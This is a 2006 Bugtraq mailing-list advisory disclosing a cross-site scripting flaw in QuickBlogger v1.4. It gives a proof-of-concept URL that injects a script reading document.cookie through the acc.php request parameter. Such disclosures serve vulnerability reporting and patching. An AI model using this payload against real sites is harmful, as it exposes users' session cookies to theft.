QuickBlogger v1.4 Cross-Site Scripting

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: QuickBlogger v1.4 Cross-Site Scripting
From: botan@xxxxxxxxxxxxx
Date: 12 Apr 2006 19:18:03 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Website : www.jlwebworks.net [closed]

Attacking method XSS

http://www.site.com[path]/acc.phprequest=<script>alert(document.cookie)</script>

Patriotic Hackers 

irc.gigachat.net #kurdhack 

Viva Kurdistan!

Prev by Date: Re: Confixx 3.1.2 <= SQL Injection
Next by Date: RE: IBM
Previous by thread: MyBB 1.10 New XSS ' member.php '
Next by thread: Re: QuickBlogger v1.4 Cross-Site Scripting
Index(es):
- Date
- Thread